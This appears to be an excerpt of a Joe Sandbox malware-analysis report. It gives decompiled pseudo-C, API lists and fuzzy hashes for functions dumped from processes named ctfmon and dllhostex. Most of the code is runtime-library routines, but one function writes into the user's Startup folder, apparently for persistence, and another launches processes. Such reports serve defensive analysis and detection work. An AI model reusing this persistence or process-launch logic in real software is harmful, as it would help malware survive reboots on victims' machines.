                                                Function 00977C42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00977C42(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x9963f8 + _a4 * 4;
				_t27 =  *0x98f008; // 0x35554c2f
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x98f008; // 0x35554c2f
							goto L13;
						}
						 *_t20 = E00970ABD(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00977CDE( *_t34);
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x98f008; // 0x35554c2f
						goto L7;
					}
					_t27 =  *0x98f008; // 0x35554c2f
					goto L8;
				}
				L2:
				return _t33;
			}










                                                0x00977c4d
                                                0x00977c56
                                                0x00977c5c
                                                0x00977c66
                                                0x00977c68
                                                0x00977c6c
                                                0x00977cd7
                                                0x00000000
                                                0x00977cd7
                                                0x00977c70
                                                0x00977c76
                                                0x00977c7c
                                                0x00977c98
                                                0x00977c98
                                                0x00977c9a
                                                0x00977c9c
                                                0x00977cc7
                                                0x00977cc9
                                                0x00977cd1
                                                0x00977cd5
                                                0x00000000
                                                0x00977cd5
                                                0x00977ca8
                                                0x00977cac
                                                0x00977cc1
                                                0x00000000
                                                0x00977cc1
                                                0x00977cb5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00977c7e
                                                0x00977c7e
                                                0x00977c80
                                                0x00977c88
                                                0x00000000
                                                0x00000000
                                                0x00977c8a
                                                0x00977c90
                                                0x00000000
                                                0x00000000
                                                0x00977c92
                                                0x00000000
                                                0x00977c92
                                                0x00977cb9
                                                0x00000000
                                                0x00977cb9
                                                0x00977c72
                                                0x00000000

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00977CA2
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00977CAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID: /LU5/
                                                • API String ID: 2279764990-937868281
                                                • Opcode ID: 9f14a1a6d156341b9adf309fb7fae99643521dcfe8cd67d61c943bb16741883d
                                                • Instruction ID: d9f311b70efccbc98b92c6d8a4038da2db12c3c8c2e2e65dff3bb296c9e12bed
                                                • Opcode Fuzzy Hash: 9f14a1a6d156341b9adf309fb7fae99643521dcfe8cd67d61c943bb16741883d
                                                • Instruction Fuzzy Hash: 47110D336186219F9B279E9CDC5056AB3D5FBC836072A8120FC9CEB354DA30DC0197D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00970A5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 42%
                                                			E00970A5D(void* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebp;
				void* _t4;
				void* _t5;
				void* _t9;

				_t8 = __ecx;
				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x32d");
				while(1) {
					_push(_a4);
					_t4 = E00975A3B(_t8); // executed
					_pop(_t9);
					if(_t4 != 0) {
						break;
					}
					_t5 = E00976248(_t9, __eflags, _a4);
					_pop(_t8);
					__eflags = _t5;
					if(_t5 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(__eflags != 0) {
							E00971283(__eflags);
						} else {
							E009712A0(__eflags);
						}
					}
				}
				return _t4;
			}







                                                0x00970a5d
                                                0x00970a63
                                                0x00970a66
                                                0x00970a68
                                                0x00970a92
                                                0x00970a92
                                                0x00970a95
                                                0x00970a9a
                                                0x00970a9d
                                                0x00000000
                                                0x00000000
                                                0x00970a76
                                                0x00970a7b
                                                0x00970a7c
                                                0x00970a7e
                                                0x00970a80
                                                0x00970a84
                                                0x00970a8d
                                                0x00970a86
                                                0x00970a86
                                                0x00970a86
                                                0x00970a84
                                                0x00970a7e
                                                0x00970aa0

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00970DA0
                                                • ___raise_securityfailure.LIBCMT ref: 00970E87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                • String ID: /LU5/
                                                • API String ID: 3761405300-937868281
                                                • Opcode ID: 0ef9f455db5b259f0415f1fb0ae63d5e056c1af430dc2d481741f93ba0c8d657
                                                • Instruction ID: 2389d54107745c84593489831f4742fe2586e46532436f727dd689757a380627
                                                • Opcode Fuzzy Hash: 0ef9f455db5b259f0415f1fb0ae63d5e056c1af430dc2d481741f93ba0c8d657
                                                • Instruction Fuzzy Hash: EB21E6B5539B00DBD712CF5DF99971637E4BB4C320F52502BE908CA3A1D3B55980EB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096A970 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 33%
                                                			E0096A970(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v530;
				void _v532;
				short _v2580;
				char _v2584;
				intOrPtr _v2588;
				intOrPtr _v2592;
				void* __esi;
				signed int _t19;
				void* _t26;
				void* _t35;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t42 = __edi;
				_t19 =  *0x98f008; // 0x35554c2f
				_v8 = _t19 ^ _t46;
				_v2592 = _a4;
				_t35 = L"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup";
				_v2588 = _a8;
				_v2584 = 3;
				asm("o16 nop [eax+eax]");
				do {
					E00973440(_t42,  &_v530, 0, 0x206);
					_t45 = _t35;
					_t26 = memcpy( &_v532, _t45, 0x40 << 2);
					_t42 = _t45 + 0x80;
					E00973440(_t45 + 0x80, _t26, 0, 0x800);
					wsprintfW( &_v2580, L"%ws\\%ws", _v2588,  &_v532);
					_t47 = _t47 + 0x34;
					E0096A760(_t35,  &_v2580, _v2592, _t45 + 0x80);
					_t35 = _t35 + 0x100;
					_t16 =  &_v2584;
					 *_t16 = _v2584 - 1;
				} while ( *_t16 != 0);
				return E00970A5D(_v8 ^ _t46, _t45);
			}

















                                                0x0096a970
                                                0x0096a979
                                                0x0096a980
                                                0x0096a988
                                                0x0096a98e
                                                0x0096a997
                                                0x0096a99d
                                                0x0096a9a7
                                                0x0096a9b0
                                                0x0096a9be
                                                0x0096a9d3
                                                0x0096a9dd
                                                0x0096a9dd
                                                0x0096a9e0
                                                0x0096a9fe
                                                0x0096aa10
                                                0x0096aa13
                                                0x0096aa18
                                                0x0096aa1e
                                                0x0096aa1e
                                                0x0096aa1e
                                                0x0096aa39

                                                APIs
                                                • wsprintfW.USER32 ref: 0096A9FE
                                                  • Part of subcall function 0096A760: GetFileAttributesW.KERNEL32(?,?,00995480,00995480,?,0096AA18), ref: 0096A786
                                                  • Part of subcall function 0096A760: wsprintfW.USER32 ref: 0096A801
                                                  • Part of subcall function 0096A760: wsprintfW.USER32 ref: 0096A84F
                                                  • Part of subcall function 0096A760: GetLocalTime.KERNEL32(?), ref: 0096A893
                                                  • Part of subcall function 0096A760: wsprintfW.USER32 ref: 0096A8C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: wsprintf$AttributesFileLocalTime
                                                • String ID: %ws\%ws$/LU5/
                                                • API String ID: 1715372494-3952417340
                                                • Opcode ID: fa3808754fce899250b068aa852870ee797e3fd30fc06964458f8d4b21dbe719
                                                • Instruction ID: e952af01d837daf7944f470fa161b52a2c37571044552807b5fa53df4ffc8b85
                                                • Opcode Fuzzy Hash: fa3808754fce899250b068aa852870ee797e3fd30fc06964458f8d4b21dbe719
                                                • Instruction Fuzzy Hash: 95114F72A4031CABDB20DF58CC85BDAB3B8BB49314F0044E9A91DB7641DA745F848F92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096A330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49processsynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E0096A330(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v96;
				void* _t19;
				WCHAR* _t20;

				_t20 = __ecx;
				E00973440(_t19,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_v96.dwFlags = 1;
				_v96.wShowWindow = 5;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				if(CreateProcessW(0, _t20, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v24) == 0) {
					return 0;
				} else {
					WaitForSingleObject(_v24, 0);
					return 1;
				}
			}







                                                0x0096a33d
                                                0x0096a344
                                                0x0096a34c
                                                0x0096a358
                                                0x0096a35f
                                                0x0096a363
                                                0x0096a380
                                                0x0096a38c
                                                0x0096a3a8
                                                0x0096a38e
                                                0x0096a393
                                                0x0096a3a0
                                                0x0096a3a0

                                                APIs
                                                • CreateProcessW.KERNEL32 ref: 0096A384
                                                • WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 0096A393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateObjectProcessSingleWait
                                                • String ID: D
                                                • API String ID: 623904672-2746444292
                                                • Opcode ID: 0ce9128996d46991623185ab108fd881bc115b835ef3771194f9b451cfdae1b0
                                                • Instruction ID: 2827c203eb39fc51eebb684954b707062cb297824d7dacc19852981b2cb9a371
                                                • Opcode Fuzzy Hash: 0ce9128996d46991623185ab108fd881bc115b835ef3771194f9b451cfdae1b0
                                                • Instruction Fuzzy Hash: 8801FE32E8020C7AEB10DF95DC47FDFB76CEB04704F208116FA187A2C0E6B269148BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977FD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 28%
                                                			E00977FD8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t31;
				void* _t32;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x98f008; // 0x35554c2f
				_v8 = _t18 ^ _t33;
				_t31 = E00977C42(0x16, "LCMapStringEx", 0x9867b0, "LCMapStringEx");
				if(_t31 == 0) {
					LCMapStringW(E00978060(_t26, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x985264(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				_pop(_t32);
				return E00970A5D(_v8 ^ _t33, _t32);
			}









                                                0x00977fd8
                                                0x00977fdd
                                                0x00977fde
                                                0x00977fe5
                                                0x00977fff
                                                0x00978006
                                                0x00978049
                                                0x00978008
                                                0x00978025
                                                0x0097802b
                                                0x0097802b
                                                0x00978054
                                                0x0097805d

                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00990E80,?,00000001,00990E80,?), ref: 00978049
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: /LU5/$LCMapStringEx
                                                • API String ID: 2568140703-3279794684
                                                • Opcode ID: 142512fc5f1aa9324d3d40dc61b4b10730b93af27b7d6d03dbe5923128b14278
                                                • Instruction ID: 519803aea35512d6c5a432e851cfe06b48bca9762cabd15278a12e8742746287
                                                • Opcode Fuzzy Hash: 142512fc5f1aa9324d3d40dc61b4b10730b93af27b7d6d03dbe5923128b14278
                                                • Instruction Fuzzy Hash: 8901E932644209FBCF165F90DC06EEE7FA6FF88754F054114FE1869260CB769931AB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00969280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 009692A7
                                                • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,00000001,00000000,00000000), ref: 009692DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Ioctlsetsockopt
                                                • String ID: /LU5/
                                                • API String ID: 1903391676-937868281
                                                • Opcode ID: d7d0708ddd889998723b23833f98475a608f67ec37dd01e9300a7371ee4d6c57
                                                • Instruction ID: 04451b06483bbb82e75e4cacfe4f4441325ccb321ac2e3a24f63c5252d229ab1
                                                • Opcode Fuzzy Hash: d7d0708ddd889998723b23833f98475a608f67ec37dd01e9300a7371ee4d6c57
                                                • Instruction Fuzzy Hash: B00119B1A50209BFEB10DF50CC45FBEBBB8EB04700F504125BD15F6290DBB06A089BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977F76 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00979E38,-00000020,00000FA0,00000000,73BCF7E0,00000000,00000000), ref: 00977FC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpin
                                                • String ID: /LU5/$InitializeCriticalSectionEx
                                                • API String ID: 2593887523-2248632019
                                                • Opcode ID: 21acc3358e245e52ea8fb1735ed3f0ca047786d3a93a0ede9b4cc2cd2133a40d
                                                • Instruction ID: cb6b028c59df4d82047079d854046eb273fa8b86d3c8afec3251434c343b746f
                                                • Opcode Fuzzy Hash: 21acc3358e245e52ea8fb1735ed3f0ca047786d3a93a0ede9b4cc2cd2133a40d
                                                • Instruction Fuzzy Hash: 84F05E32649218FBCB156F90DC06EAEBFA5EF88721F418064FC199A360DA719910ABD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977E1B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: /LU5/$FlsAlloc
                                                • API String ID: 2773662609-3169845777
                                                • Opcode ID: 66eb1a2f4238fbbede0ab03bb6eff2c2a994202ca76ceb4e698de13e5cc4fe38
                                                • Instruction ID: d80aae0f146eeaaede328b445c385045c570457e19f42896d58051e3073525d2
                                                • Opcode Fuzzy Hash: 66eb1a2f4238fbbede0ab03bb6eff2c2a994202ca76ceb4e698de13e5cc4fe38
                                                • Instruction Fuzzy Hash: 21E0E532A49318EBC3157BA09C06A6EBF94EF84B14B014159FC0A9A350DE714D0497C5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977E71 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Free
                                                • String ID: /LU5/$FlsFree
                                                • API String ID: 3978063606-596877152
                                                • Opcode ID: 8c13fb25c9cb428ae7160717bea56bfb6848dfa5d32bea1aa6a6e78924c007e6
                                                • Instruction ID: 670ad0506298a22f4d3a36c6cd3b1f12f1d9995d9f879be08edf5d9d15c549a4
                                                • Opcode Fuzzy Hash: 8c13fb25c9cb428ae7160717bea56bfb6848dfa5d32bea1aa6a6e78924c007e6
                                                • Instruction Fuzzy Hash: A9E0E532A48318EBC310BFA09C46E2EBFE4DF88B15B054158F9095B350DE314D00A7D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 01344380 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108memorysynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 56%
                                                			E01344380(char* __ecx, intOrPtr* __edx, void* __esi) {
				signed int _v12;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				long _t19;
				long _t21;
				long _t23;
				void* _t27;
				int _t33;
				int _t39;
				void* _t40;
				long _t47;
				void* _t49;
				char* _t56;
				signed int _t58;
				void* _t60;
				void* _t63;
				intOrPtr* _t64;
				intOrPtr* _t69;
				void* _t74;

				_t56 = __ecx;
				_t69 = __edx;
				if( *__ecx != 0) {
					L5:
					return _t19;
				} else {
					_t63 = CreateEventA(0, 1, 0, 0);
					if(_t63 == 0) {
						_t21 = GetLastError();
						_t53 = "CreateEvent";
						_t47 = _t21;
						E013488E0(_t40, _t47, "CreateEvent", _t56, _t63);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t23 = TlsAlloc();
						 *0x13d5b94 = _t23;
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							__eflags = E01368644();
							if(__eflags != 0) {
								E01368694(_t40, "CreateEvent", _t56, _t63, __eflags);
								_t47 = 0x16;
							}
							__eflags =  *0x13cc1e8 & 0x00000002;
							if(( *0x13cc1e8 & 0x00000002) != 0) {
								_t33 = IsProcessorFeaturePresent(0x17);
								__eflags = _t33;
								if(_t33 != 0) {
									_t47 = 7;
									asm("int 0x29");
								}
								E0135B5DC(_t40, _t53, _t56, _t63, 3, 0x40000015, 1);
								_t74 = _t74 + 0xc;
							}
							E0136336A(3);
							asm("int3");
							_push(_t69);
							_push(_t47);
							_push(_t47);
							_push(_t40);
							_t58 = E01366CCA(_t47, 0x40, 0x30);
							_v28 = _t58;
							_t49 = _t56;
							__eflags = _t58;
							if(_t58 != 0) {
								_t5 = _t58 + 0xc00; // 0xc00
								_t27 = _t5;
								__eflags = _t58 - _t27;
								if(__eflags != 0) {
									_push(_t63);
									_t6 = _t58 + 0x20; // 0x20
									_t64 = _t6;
									_t60 = _t27;
									do {
										_t7 = _t64 - 0x20; // 0x0
										E01367456(_t49, __eflags, _t7, 0xfa0, 0);
										 *(_t64 - 8) =  *(_t64 - 8) | 0xffffffff;
										 *_t64 = 0;
										_t64 = _t64 + 0x30;
										 *((intOrPtr*)(_t64 - 0x2c)) = 0;
										 *((intOrPtr*)(_t64 - 0x28)) = 0xa0a0000;
										 *((char*)(_t64 - 0x24)) = 0xa;
										 *(_t64 - 0x23) =  *(_t64 - 0x23) & 0x000000f8;
										 *((char*)(_t64 - 0x22)) = 0;
										__eflags = _t64 - 0x20 - _t60;
									} while (__eflags != 0);
									_t58 = _v12;
								}
							} else {
								_t58 = 0;
							}
							E013656E2(0);
							return _t58;
						} else {
							return _t23;
						}
					} else {
						_push(_t40);
						asm("lock cmpxchg [ecx], edx");
						if(0 != 0) {
							CloseHandle(_t63);
							_t19 = WaitForSingleObject(0, 0xffffffff);
							goto L5;
						} else {
							 *_t69(); // executed
							_t39 = SetEvent(_t63);
							 *_t56 = 1;
							return _t39;
						}
					}
				}
			}
























                                                0x01344382
                                                0x01344384
                                                0x01344389
                                                0x013443d5
                                                0x013443d7
                                                0x0134438b
                                                0x0134439a
                                                0x0134439e
                                                0x013443d8
                                                0x013443de
                                                0x013443e3
                                                0x013443e5
                                                0x013443ea
                                                0x013443eb
                                                0x013443ec
                                                0x013443ed
                                                0x013443ee
                                                0x013443ef
                                                0x013443f0
                                                0x013443f6
                                                0x013443fb
                                                0x013443fe
                                                0x0135ebbe
                                                0x0135ebc0
                                                0x0135ebc4
                                                0x0135ebc9
                                                0x0135ebc9
                                                0x0135ebca
                                                0x0135ebd1
                                                0x0135ebd5
                                                0x0135ebdb
                                                0x0135ebdd
                                                0x0135ebe1
                                                0x0135ebe2
                                                0x0135ebe2
                                                0x0135ebed
                                                0x0135ebf2
                                                0x0135ebf2
                                                0x0135ebf7
                                                0x0135ebfc
                                                0x0135ebff
                                                0x0135ec02
                                                0x0135ec03
                                                0x0135ec04
                                                0x0135ec0f
                                                0x0135ec13
                                                0x0135ec17
                                                0x0135ec18
                                                0x0135ec1a
                                                0x0135ec20
                                                0x0135ec20
                                                0x0135ec26
                                                0x0135ec28
                                                0x0135ec2a
                                                0x0135ec2b
                                                0x0135ec2b
                                                0x0135ec2e
                                                0x0135ec30
                                                0x0135ec36
                                                0x0135ec3a
                                                0x0135ec3f
                                                0x0135ec43
                                                0x0135ec45
                                                0x0135ec48
                                                0x0135ec4e
                                                0x0135ec55
                                                0x0135ec59
                                                0x0135ec5d
                                                0x0135ec60
                                                0x0135ec60
                                                0x0135ec64
                                                0x0135ec67
                                                0x0135ec1c
                                                0x0135ec1c
                                                0x0135ec1c
                                                0x0135ec69
                                                0x0135ec76
                                                0x01344404
                                                0x01344404
                                                0x01344404
                                                0x013443a0
                                                0x013443a0
                                                0x013443a8
                                                0x013443b0
                                                0x013443c4
                                                0x013443cd
                                                0x00000000
                                                0x013443b2
                                                0x013443b2
                                                0x013443b5
                                                0x013443bd
                                                0x013443c2
                                                0x013443c2
                                                0x013443b0
                                                0x0134439e

                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,01348023), ref: 01344394
                                                • SetEvent.KERNEL32(00000000,?,?,?,?,01348023), ref: 013443B5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,01348023), ref: 013443C4
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,01348023), ref: 013443CD
                                                • GetLastError.KERNEL32(?,?,?,01348023), ref: 013443D8
                                                • TlsAlloc.KERNEL32(?,?,?,01348023), ref: 013443F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Event$AllocCloseCreateErrorHandleLastObjectSingleWait
                                                • String ID: CreateEvent
                                                • API String ID: 3340787615-2692171526
                                                • Opcode ID: e13c49cca3caf5294cd1cd0198185ffb943e134b74fa2e073b50c7dc2b29a30e
                                                • Instruction ID: 0f004868c124cdbf60e68c3f5a3290b8b1292750f8c1689dd8faaeaa7231bdc3
                                                • Opcode Fuzzy Hash: e13c49cca3caf5294cd1cd0198185ffb943e134b74fa2e073b50c7dc2b29a30e
                                                • Instruction Fuzzy Hash: 0B2147723443126BF725266DBC4AF567B8CDB95B3DF200139FB09C61C4EEA194018260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01366F26 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 1366f26-1366f32 39 1366fd8-1366fdb 38->39 40 1366f37-1366f47 39->40 41 1366fe1 39->41 42 1366f54-1366f6d LoadLibraryExW 40->42 43 1366f49-1366f4c 40->43 44 1366fe3-1366fe9 41->44 47 1366fbf-1366fc8 42->47 48 1366f6f-1366f78 GetLastError 42->48 45 1366fd5 43->45 46 1366f52 43->46 45->39 49 1366fd1-1366fd3 46->49 47->49 52 1366fca-1366fcb FreeLibrary 47->52 50 1366faf 48->50 51 1366f7a-1366f8c call 1360d63 48->51 49->45 53 1366fea-1366fec 49->53 55 1366fb1-1366fb3 50->55 51->50 58 1366f8e-1366fa0 call 1360d63 51->58 52->49 53->44 55->47 57 1366fb5-1366fbd 55->57 57->45 58->50 61 1366fa2-1366fad LoadLibraryExW 58->61 61->55
                                                C-Code - Quality: 100%
                                                			E01366F26(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x13d5480 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x13b3c00 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E01360D63(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E01360D63(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}














                                                0x01366f2f
                                                0x01366fd8
                                                0x01366f37
                                                0x01366f39
                                                0x01366f40
                                                0x01366f42
                                                0x01366f47
                                                0x01366f54
                                                0x01366f63
                                                0x01366f69
                                                0x01366f6d
                                                0x01366fbf
                                                0x01366fbf
                                                0x01366fc4
                                                0x01366fc8
                                                0x01366fcb
                                                0x01366fcb
                                                0x01366fd1
                                                0x01366fd3
                                                0x01366fea
                                                0x01366fe3
                                                0x01366fe9
                                                0x01366fe9
                                                0x01366fd5
                                                0x01366fd5
                                                0x00000000
                                                0x01366fd5
                                                0x01366f6f
                                                0x01366f78
                                                0x01366faf
                                                0x01366faf
                                                0x01366fb1
                                                0x01366fb3
                                                0x00000000
                                                0x00000000
                                                0x01366fbb
                                                0x00000000
                                                0x01366fbb
                                                0x01366f82
                                                0x01366f87
                                                0x01366f8c
                                                0x00000000
                                                0x00000000
                                                0x01366f96
                                                0x01366f9b
                                                0x01366fa0
                                                0x00000000
                                                0x00000000
                                                0x01366fa5
                                                0x01366fab
                                                0x00000000
                                                0x01366fab
                                                0x01366f4c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01366f52
                                                0x01366fe1
                                                0x00000000

                                                Strings
                                                Memory Dump Source
